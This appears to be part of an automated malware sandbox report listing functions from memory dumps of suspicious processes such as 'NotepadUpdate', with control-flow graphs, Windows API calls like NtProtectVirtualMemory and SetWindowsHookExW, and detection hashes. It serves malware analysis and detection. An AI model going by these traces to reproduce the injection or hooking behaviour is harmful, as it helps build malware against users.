                                  control_flow_graph 308 30f2e7a-30f2ebc 309 30f2ebe-30f2ec0 308->309 310 30f2ec8-30f2ecb 308->310 311 30f3236-30f3265 309->311 312 30f2ec6 309->312 310->311 313 30f2ed1-30f2ef4 310->313 329 30f326c-30f3270 311->329 312->313 316 30f2ef6-30f2ef8 313->316 317 30f2f00-30f2f03 313->317 316->311 319 30f2efe 316->319 317->311 320 30f2f09-30f2f2f 317->320 319->320 323 30f2f3d-30f2f41 320->323 324 30f2f31-30f2f35 320->324 323->311 327 30f2f47-30f2f55 323->327 324->311 326 30f2f3b 324->326 326->327 330 30f2f57-30f2f62 327->330 331 30f2f64-30f2f6c 327->331 332 30f327d-30f3366 NtProtectVirtualMemory 329->332 333 30f3272-30f327c 329->333 334 30f2f6f-30f2f71 330->334 331->334 362 30f336f-30f3394 332->362 363 30f3368-30f336e 332->363 335 30f2f7d-30f2f80 334->335 336 30f2f73-30f2f75 334->336 335->311 339 30f2f86-30f2fa9 335->339 336->311 338 30f2f7b 336->338 338->339 343 30f2fab-30f2fad 339->343 344 30f2fb5-30f2fb8 339->344 343->311 345 30f2fb3 343->345 344->311 346 30f2fbe-30f2fe2 344->346 345->346 349 30f2fee-30f2ff1 346->349 350 30f2fe4-30f2fe6 346->350 349->311 353 30f2ff7-30f3018 349->353 350->311 352 30f2fec 350->352 352->353 357 30f301a-30f301c 353->357 358 30f3024-30f3027 353->358 357->311 359 30f3022 357->359 358->311 360 30f302d-30f3051 358->360 359->360 366 30f305d-30f3060 360->366 367 30f3053-30f3055 360->367 363->362 366->311 369 30f3066-30f308a 366->369 367->311 370 30f305b 367->370 373 30f308c-30f308e 369->373 374 30f3096-30f3099 369->374 370->369 373->311 375 30f3094 373->375 374->311 376 30f309f-30f30c3 374->376 375->376 378 30f30cf-30f30d2 376->378 379 30f30c5-30f30c7 376->379 378->311 381 30f30d8-30f30eb 378->381 379->311 380 30f30cd 379->380 380->381 381->329 383 30f30f1-30f3120 381->383 384 30f312c-30f312f 383->384 385 30f3122-30f3124 383->385 384->311 387 30f3135-30f314d 384->387 385->311 386 30f312a 385->386 386->387 389 30f314f-30f3151 387->389 390 30f3159-30f315c 387->390 389->311 391 30f3157 389->391 390->311 392 30f3162-30f3179 390->392 391->392 395 30f317f-30f31a2 392->395 396 30f3225-30f322e 392->396 398 30f31ae-30f31b1 395->398 399 30f31a4-30f31a6 395->399 396->383 397 30f3234 396->397 397->329 398->311 401 30f31b7-30f31e7 398->401 399->311 400 30f31ac 399->400 400->401 403 30f31ef-30f31f2 401->403 404 30f31e9-30f31eb 401->404 403->311 406 30f31f4-30f3211 403->406 404->311 405 30f31ed 404->405 405->406 408 30f3219-30f321c 406->408 409 30f3213-30f3215 406->409 408->311 411 30f321e-30f3223 408->411 409->311 410 30f3217 409->410 410->411 411->329
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q
                                  • API String ID: 2706961497-612143306
                                  • Opcode ID: e96b21d5098794a782d3e19845f517cd1f13387634f8a0f43d0b3e77310cf762
                                  • Instruction ID: 1f4340d712c247ba4f09ad74887ad5fc294433cd4e38f9fda288757ed2e142fa
                                  • Opcode Fuzzy Hash: e96b21d5098794a782d3e19845f517cd1f13387634f8a0f43d0b3e77310cf762
                                  • Instruction Fuzzy Hash: 68E1A339F063054FDB94DAAD8CD03AEB6E76BC8230F5D8679DA15DBB84EA34D8014741
                                  Function 030F3397 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 412 30f3397-30f33a0 413 30f3333-30f3335 412->413 414 30f33a2-30f33e0 call 30f1354 412->414 415 30f3337-30f3366 NtProtectVirtualMemory 413->415 416 30f32c3-30f3330 413->416 419 30f336f-30f3394 415->419 420 30f3368-30f336e 415->420 416->415 420->419
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: dq
                                  • API String ID: 2706961497-4057445327
                                  • Opcode ID: 802a5ee97df55dfb6595330dfc24574a045267eb56ffa2db15b71f6ac71ea5e7
                                  • Instruction ID: 15725d11a35977490e6a971880c6ce5291956b963e89d02ac081e77c1c0b23b9
                                  • Opcode Fuzzy Hash: 802a5ee97df55dfb6595330dfc24574a045267eb56ffa2db15b71f6ac71ea5e7
                                  • Instruction Fuzzy Hash: EF31C7B58053499FCB50DFAAD880BDEBBF4FF49220F18846AE418E7240C7349900CBA5
                                  Function 030F32D0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 704 30f32d0-30f3366 NtProtectVirtualMemory 707 30f336f-30f3394 704->707 708 30f3368-30f336e 704->708 708->707
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 030F3359
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 3634f4cfa85ddec060e6979c01e7b5cd1c21bed221c201857bcbba4be8ad7e0f
                                  • Instruction ID: 52a6906c516210d2d3254f70efd21116456b7c46eb2400e3fb0d9c15e05de22c
                                  • Opcode Fuzzy Hash: 3634f4cfa85ddec060e6979c01e7b5cd1c21bed221c201857bcbba4be8ad7e0f
                                  • Instruction Fuzzy Hash: 2E21E3B5D013499FDB10DFAAD980ADEFBF5FF48310F24842AE919A7250C7759900CBA5
                                  Function 030FA612 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 263 30fa612-30fa6a7 GetCurrentProcess 268 30fa6a9-30fa6af 263->268 269 30fa6b0-30fa6e4 GetCurrentThread 263->269 268->269 270 30fa6ed-30fa721 GetCurrentProcess 269->270 271 30fa6e6-30fa6ec 269->271 273 30fa72a-30fa745 call 30fa7e8 270->273 274 30fa723-30fa729 270->274 271->270 277 30fa74b-30fa77a GetCurrentThreadId 273->277 274->273 278 30fa77c-30fa782 277->278 279 30fa783-30fa7e5 277->279 278->279
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 030FA696
                                  • GetCurrentThread.KERNEL32 ref: 030FA6D3
                                  • GetCurrentProcess.KERNEL32 ref: 030FA710
                                  • GetCurrentThreadId.KERNEL32 ref: 030FA769
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 9163cab208521fa1ef2370223f8732fbe5b6fe6dd13388fb465be93cedc1950b
                                  • Instruction ID: 0c4302dba6116104377dca1d09dee9c8dd35aed3dcad8391f3103d7dfb8124e1
                                  • Opcode Fuzzy Hash: 9163cab208521fa1ef2370223f8732fbe5b6fe6dd13388fb465be93cedc1950b
                                  • Instruction Fuzzy Hash: CA5133B19013098FEB54CFAAD988BEEBBF1EB48314F248459E119AB250D7346944CF65
                                  Function 030FA618 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 286 30fa618-30fa6a7 GetCurrentProcess 290 30fa6a9-30fa6af 286->290 291 30fa6b0-30fa6e4 GetCurrentThread 286->291 290->291 292 30fa6ed-30fa721 GetCurrentProcess 291->292 293 30fa6e6-30fa6ec 291->293 295 30fa72a-30fa745 call 30fa7e8 292->295 296 30fa723-30fa729 292->296 293->292 299 30fa74b-30fa77a GetCurrentThreadId 295->299 296->295 300 30fa77c-30fa782 299->300 301 30fa783-30fa7e5 299->301 300->301
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 030FA696
                                  • GetCurrentThread.KERNEL32 ref: 030FA6D3
                                  • GetCurrentProcess.KERNEL32 ref: 030FA710
                                  • GetCurrentThreadId.KERNEL32 ref: 030FA769
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 440ad99addbdfa6b8871edb69f6f07bb20ee41e8cf708fbaeb2cf890248facdb
                                  • Instruction ID: 3f6544ef8adc59fbbf1e7de4dd2cd905c229cd48a93c8da81bcf7630fe92a1ca
                                  • Opcode Fuzzy Hash: 440ad99addbdfa6b8871edb69f6f07bb20ee41e8cf708fbaeb2cf890248facdb
                                  • Instruction Fuzzy Hash: 095143B19013098FEB54CFAAD988BAEBBF1EB48314F248459E119AB250DB346944CF65
                                  Function 030FA860 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 712 30fa860-30fa8f4 DuplicateHandle 713 30fa8fd-30fa91a 712->713 714 30fa8f6-30fa8fc 712->714 714->713
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FA8E7
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: f4d6a3c5a14853c8b6a208060f3b3df7e3a7a6e3697336b991bbf070b745a89b
                                  • Instruction ID: 8c32a8c80b6c3194635081e7babd1bd1fb7f72509c6bd99874e99bc77a21cd81
                                  • Opcode Fuzzy Hash: f4d6a3c5a14853c8b6a208060f3b3df7e3a7a6e3697336b991bbf070b745a89b
                                  • Instruction Fuzzy Hash: 7F21E3B5D00249EFDB10CF9AD484ADEFBF4EB48310F14841AE918A7350C378A945CFA5
                                  Function 030FA858 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 728 30fa858-30fa8f4 DuplicateHandle 729 30fa8fd-30fa91a 728->729 730 30fa8f6-30fa8fc 728->730 730->729
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030FA8E7
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 71d8f98d4916036e3a99fb797376fee57bdf3c3ea212717981b2dfc41ee35d03
                                  • Instruction ID: 5657b662d8cefd55a0fdbfdaedc811da2f83d5fbbc3a8e95c6a10387dd3ce161
                                  • Opcode Fuzzy Hash: 71d8f98d4916036e3a99fb797376fee57bdf3c3ea212717981b2dfc41ee35d03
                                  • Instruction Fuzzy Hash: D62100B5D00249EFDB10CFAAD484ADEFBF4FB08310F14841AE919A7610C378A941CFA5
                                  Function 030F3798 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 717 30f3798-30f53aa 720 30f53ac 717->720 721 30f53b6-30f53e8 SetWindowsHookExW 717->721 724 30f53b4 720->724 722 30f53ea-30f53f0 721->722 723 30f53f1-30f5416 721->723 722->723 724->721
                                  APIs
                                  • SetWindowsHookExW.USER32(02EF45D0,00000000,?,?), ref: 030F53DB
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: e9e80dc7df99b6b9f87cc71328d1db388816de3d155ef889620c561bff130b43
                                  • Instruction ID: 68d64b54ff4d905d84bdebdbae6442c1f007dc78c0faa7281b3964b3f0264b40
                                  • Opcode Fuzzy Hash: e9e80dc7df99b6b9f87cc71328d1db388816de3d155ef889620c561bff130b43
                                  • Instruction Fuzzy Hash: 18213271D002089FDB14DFAAC844BEEFBF4FB88310F14842AE519A7650CBB4A940CFA5
                                  Function 030F535A Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 733 30f535a-30f53aa 736 30f53ac 733->736 737 30f53b6-30f53e8 SetWindowsHookExW 733->737 740 30f53b4 736->740 738 30f53ea-30f53f0 737->738 739 30f53f1-30f5416 737->739 738->739 740->737
                                  APIs
                                  • SetWindowsHookExW.USER32(02EF45D0,00000000,?,?), ref: 030F53DB
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3725062932.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_30f0000_regasms.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 7d61e009846dc5e45beeeaa7d6172f99d8822e6ed177f300f0b0b160b7625813
                                  • Instruction ID: f830b87a2b2745cf0775148b8f8e014df4cb4bda70c20add28b127cdf27f6b40
                                  • Opcode Fuzzy Hash: 7d61e009846dc5e45beeeaa7d6172f99d8822e6ed177f300f0b0b160b7625813
                                  • Instruction Fuzzy Hash: 65211571D002099FDB14DFAAC944BEEFBF5EF88310F14842AE415A7650CBB4A945CFA5
                                  Function 02EFD0FC Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3724554807.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_2efd000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf2a0cd434264e307d2fb99ad8fb80b0b0113b1e6d13d6c0c5bc737232dab8c9
                                  • Instruction ID: d35cefb1237dbf8b60eaa7b1463eb5aab3aaafb59d2c575d961f6617cea8fee7
                                  • Opcode Fuzzy Hash: cf2a0cd434264e307d2fb99ad8fb80b0b0113b1e6d13d6c0c5bc737232dab8c9
                                  • Instruction Fuzzy Hash: 5721F271544204EFEB55DF24DDC0B26BFA5FB88318F20C56DEA0A4B292C336D846CA72
                                  Function 02EFD0F7 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000001B.00000002.3724554807.0000000002EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EFD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_27_2_2efd000_regasms.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction ID: 05e84e50623aa9b41f884a276a73462698895f09322d067ffc22b25b2d8ee9bf
                                  • Opcode Fuzzy Hash: 9e088ad8a07711d9d3566a887b1f888bc4d4e2f61ff705deeaaa2a632ac83149
                                  • Instruction Fuzzy Hash: E711BB75544284DFDB06CF10D9C4B15BFA1FB88318F24C6A9DD494B696C33AD44ACB62

                                  Execution Graph

                                  Execution Coverage:34.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:8
                                  Total number of Limit Nodes:0
                                  execution_graph 2925 f732d0 2926 f7331e NtProtectVirtualMemory 2925->2926 2928 f73368 2926->2928 2929 f72e7a 2931 f72ebe 2929->2931 2930 f73272 2931->2930 2932 f73337 NtProtectVirtualMemory 2931->2932 2933 f73368 2932->2933

                                  Executed Functions

                                  Function 00F72E7A Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 455nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 f72e7a-f72ebc 1 f72ebe-f72ec0 0->1 2 f72ec8-f72ecb 0->2 3 f73236-f73265 1->3 4 f72ec6 1->4 2->3 5 f72ed1-f72ef4 2->5 21 f7326c-f73270 3->21 4->5 8 f72ef6-f72ef8 5->8 9 f72f00-f72f03 5->9 8->3 11 f72efe 8->11 9->3 12 f72f09-f72f2f 9->12 11->12 15 f72f31-f72f35 12->15 16 f72f3d-f72f41 12->16 15->3 17 f72f3b 15->17 16->3 18 f72f47-f72f55 16->18 17->18 24 f72f57-f72f62 18->24 25 f72f64-f72f6c 18->25 22 f73272-f7327c 21->22 23 f7327d-f73366 NtProtectVirtualMemory 21->23 49 f7336f-f73394 23->49 50 f73368-f7336e 23->50 26 f72f6f-f72f71 24->26 25->26 28 f72f73-f72f75 26->28 29 f72f7d-f72f80 26->29 28->3 30 f72f7b 28->30 29->3 31 f72f86-f72fa9 29->31 30->31 35 f72fb5-f72fb8 31->35 36 f72fab-f72fad 31->36 35->3 38 f72fbe-f72fe2 35->38 36->3 37 f72fb3 36->37 37->38 41 f72fe4-f72fe6 38->41 42 f72fee-f72ff1 38->42 41->3 44 f72fec 41->44 42->3 45 f72ff7-f73018 42->45 44->45 51 f73024-f73027 45->51 52 f7301a-f7301c 45->52 50->49 51->3 54 f7302d-f73051 51->54 52->3 53 f73022 52->53 53->54 58 f73053-f73055 54->58 59 f7305d-f73060 54->59 58->3 61 f7305b 58->61 59->3 62 f73066-f7308a 59->62 61->62 64 f73096-f73099 62->64 65 f7308c-f7308e 62->65 64->3 67 f7309f-f730c3 64->67 65->3 66 f73094 65->66 66->67 69 f730c5-f730c7 67->69 70 f730cf-f730d2 67->70 69->3 72 f730cd 69->72 70->3 71 f730d8-f730eb 70->71 71->21 74 f730f1-f73120 71->74 72->71 75 f73122-f73124 74->75 76 f7312c-f7312f 74->76 75->3 77 f7312a 75->77 76->3 78 f73135-f7314d 76->78 77->78 80 f7314f-f73151 78->80 81 f73159-f7315c 78->81 80->3 82 f73157 80->82 81->3 83 f73162-f73179 81->83 82->83 86 f73225-f7322e 83->86 87 f7317f-f731a2 83->87 86->74 90 f73234 86->90 88 f731a4-f731a6 87->88 89 f731ae-f731b1 87->89 88->3 91 f731ac 88->91 89->3 92 f731b7-f731e7 89->92 90->21 91->92 94 f731ef-f731f2 92->94 95 f731e9-f731eb 92->95 94->3 97 f731f4-f73211 94->97 95->3 96 f731ed 95->96 96->97 99 f73213-f73215 97->99 100 f73219-f7321c 97->100 99->3 101 f73217 99->101 100->3 102 f7321e-f73223 100->102 101->102 102->21
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00F73359
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000020.00000002.1644730523.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_32_2_f70000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID: 4|q$D@$D@
                                  • API String ID: 2706961497-3182924711
                                  • Opcode ID: 29e3796d2cae0451f895af9c5771b7641e124d807cea88eb73ec9b622c368a9a
                                  • Instruction ID: c00fc3a962d42d824c2ca5f61b71e0d7f3b8ce228bdf1499cf01975f3d484784
                                  • Opcode Fuzzy Hash: 29e3796d2cae0451f895af9c5771b7641e124d807cea88eb73ec9b622c368a9a
                                  • Instruction Fuzzy Hash: FEE19032F043455BDB14CAAD8CD03AE76E36BC8324F69C22AD519DB385EA74DE01B742
                                  Function 00F732D0 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 388 f732d0-f73366 NtProtectVirtualMemory 391 f7336f-f73394 388->391 392 f73368-f7336e 388->392 392->391
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 00F73359
                                  Memory Dump Source
                                  • Source File: 00000020.00000002.1644730523.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_32_2_f70000_AtkzppDHiyvcIR.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d9f05d389d9c6f4fd4677cd7827f008e0aed2f08f6884b875f068b2674ebcf29
                                  • Instruction ID: 6fb714537accd9a331956311ed938d8aa354589daa7dbbe6c73d14496dac2263
                                  • Opcode Fuzzy Hash: d9f05d389d9c6f4fd4677cd7827f008e0aed2f08f6884b875f068b2674ebcf29
                                  • Instruction Fuzzy Hash: 0021D2B1D013499FDB10DFAAD980ADEFBF5FF48310F24842AE519A7250C7759901CBA5

                                  Execution Graph

                                  Execution Coverage:10.8%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:46
                                  Total number of Limit Nodes:3
                                  execution_graph 30038 62c43de 30039 62c43f2 30038->30039 30041 62c43f9 30038->30041 30040 62c444a CallWindowProcW 30039->30040 30039->30041 30040->30041 29998 147d580 29999 147d585 GetCurrentProcess 29998->29999 30001 147d611 29999->30001 30002 147d618 GetCurrentThread 29999->30002 30001->30002 30003 147d655 GetCurrentProcess 30002->30003 30004 147d64e 30002->30004 30005 147d68b 30003->30005 30004->30003 30006 147d6b3 GetCurrentThreadId 30005->30006 30007 147d6e4 30006->30007 30042 62c1df0 30043 62c1e58 CreateWindowExW 30042->30043 30045 62c1f14 30043->30045 30008 147d7c8 30009 147d7cd DuplicateHandle 30008->30009 30010 147d85e 30009->30010 30011 1474668 30012 147467a 30011->30012 30016 1474778 30012->30016 30021 14746b8 30012->30021 30013 1474686 30017 147477c 30016->30017 30026 1474878 30017->30026 30030 1474888 30017->30030 30022 14746bc 30021->30022 30024 1474878 CreateActCtxA 30022->30024 30025 1474888 CreateActCtxA 30022->30025 30023 14747a7 30023->30013 30024->30023 30025->30023 30027 1474880 30026->30027 30028 147498c 30027->30028 30034 14744b4 30027->30034 30031 1474889 30030->30031 30032 147498c 30031->30032 30033 14744b4 CreateActCtxA 30031->30033 30032->30032 30033->30032 30035 1475918 CreateActCtxA 30034->30035 30037 14759db 30035->30037 30046 147b218 30047 147b227 30046->30047 30049 147b300 30046->30049 30051 147b304 30049->30051 30050 147b2b5 30050->30047 30051->30050 30052 147b548 GetModuleHandleW 30051->30052 30053 147b575 30052->30053 30053->30047

                                  Executed Functions

                                  Function 092D3668 Relevance: 7.0, Strings: 5, Instructions: 725COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (oq$(oq$,q$,q$Hq
                                  • API String ID: 0-962059274
                                  • Opcode ID: 2a4f0d9b2e8bae6dcb28becf75c51a513b6782139f4bc48348a2c5110da7b4d2
                                  • Instruction ID: cc1a80822df6ab687dee847dfc75e4ce282a291792f3de6844156204187969ec
                                  • Opcode Fuzzy Hash: 2a4f0d9b2e8bae6dcb28becf75c51a513b6782139f4bc48348a2c5110da7b4d2
                                  • Instruction Fuzzy Hash: 78527035B11215DFDB14DF69D984AADBBB2BF88314B198069F806DB3A0DB31EC41CB91
                                  Function 092D1240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1502 92d1240-92d1271 1503 92d1278-92d133d 1502->1503 1504 92d1273 1502->1504 1510 92d138b-92d139c 1503->1510 1504->1503 1511 92d133f-92d1377 1510->1511 1512 92d139e-92d1406 1510->1512 1515 92d137e-92d1388 1511->1515 1516 92d1379 1511->1516 1520 92d1c60-92d1c8b 1512->1520 1515->1510 1516->1515 1522 92d1c8d-92d1cb6 1520->1522 1523 92d1cb8-92d1cba 1520->1523 1524 92d1cc0-92d1cd4 1522->1524 1523->1524 1526 92d140b-92d1412 1524->1526 1527 92d1cda-92d1ce1 1524->1527 1528 92d1464-92d149f 1526->1528 1530 92d14a5-92d14ae 1528->1530 1531 92d1414-92d142a 1528->1531 1532 92d14b1-92d14e5 1530->1532 1533 92d142c 1531->1533 1534 92d1431-92d144f 1531->1534 1538 92d1504-92d152b 1532->1538 1539 92d14e7-92d1501 1532->1539 1533->1534 1535 92d1456-92d1461 1534->1535 1536 92d1451 1534->1536 1535->1528 1536->1535 1542 92d152d-92d1556 1538->1542 1543 92d1558 1538->1543 1539->1538 1544 92d1562-92d1570 1542->1544 1543->1544 1546 92d1576-92d157d 1544->1546 1547 92d1660-92d170d 1544->1547 1548 92d1643-92d1654 1546->1548 1571 92d170f 1547->1571 1572 92d1713-92d1715 1547->1572 1549 92d165a-92d165b 1548->1549 1550 92d1582-92d1598 1548->1550 1554 92d1c07-92d1c42 1549->1554 1552 92d159f-92d15fd 1550->1552 1553 92d159a 1550->1553 1564 92d15ff 1552->1564 1565 92d1604-92d1629 1552->1565 1553->1552 1554->1532 1559 92d1c48-92d1c5f 1554->1559 1559->1520 1564->1565 1569 92d163f-92d1640 1565->1569 1570 92d162b-92d1637 1565->1570 1569->1548 1570->1569 1573 92d1717 1571->1573 1574 92d1711 1571->1574 1575 92d171c-92d1723 1572->1575 1573->1575 1574->1572 1576 92d1725-92d172e 1575->1576 1577 92d1731-92d1762 1575->1577 1576->1577 1579 92d17b5-92d17f0 1577->1579 1581 92d1764-92d1779 1579->1581 1582 92d17f6-92d1809 1579->1582 1583 92d177b 1581->1583 1584 92d1780-92d179e 1581->1584 1588 92d180b-92d19b2 1582->1588 1589 92d1811-92d1831 1582->1589 1583->1584 1586 92d17a5-92d17b2 1584->1586 1587 92d17a0 1584->1587 1586->1579 1587->1586 1591 92d19ba-92d1a59 1588->1591 1592 92d19b4-92d19b5 1588->1592 1595 92d183a-92d18fd 1589->1595 1613 92d1a5b 1591->1613 1614 92d1a60-92d1a92 1591->1614 1594 92d1bc2-92d1bef 1592->1594 1600 92d1c06 1594->1600 1601 92d1bf1-92d1c05 1594->1601 1611 92d18ff 1595->1611 1612 92d1904-92d1917 1595->1612 1600->1554 1601->1600 1611->1612 1615 92d191e-92d192b 1612->1615 1616 92d1919 1612->1616 1613->1614 1620 92d1a99-92d1acb 1614->1620 1621 92d1a94 1614->1621 1618 92d192d 1615->1618 1619 92d1932-92d1956 1615->1619 1616->1615 1618->1619 1624 92d195d-92d1977 1619->1624 1625 92d1958 1619->1625 1626 92d1acd 1620->1626 1627 92d1ad2-92d1b2f 1620->1627 1621->1620 1628 92d1979-92d1998 1624->1628 1629 92d19a2-92d19a3 1624->1629 1625->1624 1626->1627 1634 92d1b81-92d1ba3 1627->1634 1635 92d1b31-92d1b7b 1627->1635 1630 92d199f 1628->1630 1631 92d199a 1628->1631 1629->1594 1630->1629 1631->1630 1639 92d1bad-92d1bc0 1634->1639 1635->1634 1639->1594
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.1589910307.00000000092D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_92d0000_NotepadUpdate.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-2564639436
                                  • Opcode ID: 79cab103032ef214213de6971ef685ccf48b20e16fd797d50796e63018f22745
                                  • Instruction ID: a58280d44017599b73aa435a3230016e3f0775bdec5650bf4f3a4bbaf7cbe414
                                  • Opcode Fuzzy Hash: 79cab103032ef214213de6971ef685ccf48b20e16fd797d50796e63018f22745
